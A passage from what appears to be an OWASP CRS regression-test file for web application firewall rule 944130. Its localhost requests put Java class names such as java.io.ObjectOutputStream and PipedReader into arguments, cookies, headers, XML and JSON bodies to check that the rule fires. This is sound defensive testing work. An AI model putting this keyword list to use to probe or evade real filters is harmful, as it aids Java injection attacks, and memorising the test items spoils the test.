- stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.InputStreamReader=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-159 + desc: "Request header test includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.InputStreamReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-160 + desc: "XML attribute value includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-161 + desc: "XML element value includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.InputStreamReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-162 + desc: "Nested XML element value includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.InputStreamReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-163 + desc: "Content-Type text/plain includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.InputStreamReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-164 + desc: "Content-Type application/json arg value includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": 
\"java.io.InputStreamReader\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-165 + desc: "Content-Type application/json arg name includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.InputStreamReader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-166 + desc: "Argument test includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.LineNumberReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-167 + desc: "Argument name includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.LineNumberReader=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-168 + desc: "Cookie test includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + 
headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.LineNumberReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-169 + desc: "Cookie name includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.LineNumberReader=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-170 + desc: "Request header test includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.LineNumberReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-171 + desc: "XML attribute value includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-172 + desc: "XML element value includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.LineNumberReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-173 + desc: "Nested XML element value includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.LineNumberReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-174 + desc: "Content-Type text/plain includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.LineNumberReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-175 + desc: "Content-Type application/json arg value includes 
keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.LineNumberReader\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-176 + desc: "Content-Type application/json arg name includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.LineNumberReader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-177 + desc: "Argument test includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.ObjectOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-178 + desc: "Argument name includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.ObjectOutputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-179 + desc: "Cookie test includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.ObjectOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-180 + desc: "Cookie name includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.ObjectOutputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-181 + desc: "Request header test includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/x-www-form-urlencoded" + test: java.io.ObjectOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-182 + desc: "XML attribute value includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-183 + desc: "XML element value includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.ObjectOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-184 + desc: "Nested XML element value includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.ObjectOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-185 + desc: "Content-Type text/plain includes keyword java.io.ObjectOutputStream" + stages: + - stage: + 
input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.ObjectOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-186 + desc: "Content-Type application/json arg value includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.ObjectOutputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-187 + desc: "Content-Type application/json arg name includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.ObjectOutputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-188 + desc: "Argument test includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.OutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-189 + desc: "Argument name includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.OutputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-190 + desc: "Cookie test includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.OutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-191 + desc: "Cookie name includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.OutputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + 
- test_title: 944130-192 + desc: "Request header test includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.OutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-193 + desc: "XML attribute value includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-194 + desc: "XML element value includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.OutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-195 + desc: "Nested XML element value includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.OutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-196 + desc: "Content-Type text/plain includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.OutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-197 + desc: "Content-Type application/json arg value includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.OutputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-198 + desc: "Content-Type application/json arg name includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: 
"{\"java.io.OutputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-199 + desc: "Argument test includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.PipedOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-200 + desc: "Argument name includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PipedOutputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-201 + desc: "Cookie test includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.PipedOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-202 + desc: "Cookie name includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" 
+ port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.PipedOutputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-203 + desc: "Request header test includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.PipedOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-204 + desc: "XML attribute value includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-205 + desc: "XML element value includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + 
Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PipedOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-206 + desc: "Nested XML element value includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PipedOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-207 + desc: "Content-Type text/plain includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.PipedOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-208 + desc: "Content-Type application/json arg value includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.PipedOutputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-209 + desc: "Content-Type application/json 
arg name includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.PipedOutputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-210 + desc: "Argument test includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.PipedReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-211 + desc: "Argument name includes keyword 